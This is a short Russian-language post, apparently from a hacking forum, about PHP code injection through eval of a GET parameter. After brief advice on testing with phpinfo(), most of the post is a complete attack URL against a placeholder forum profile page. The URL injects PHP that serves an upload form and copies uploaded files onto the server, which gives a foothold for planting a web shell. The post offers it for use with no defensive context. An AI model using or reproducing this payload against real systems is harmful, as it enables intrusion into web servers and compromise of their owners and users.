ну инклуде http не всегда работает в силу нескоьких причин , поэтому чтобы проверить что происходит ли вобще php injection тестим на phpinfo() например, а вобще можно и без include обойтись, например с помощью eval($_GET[q]):

http://forum.com/profile.php?q=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@co py($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>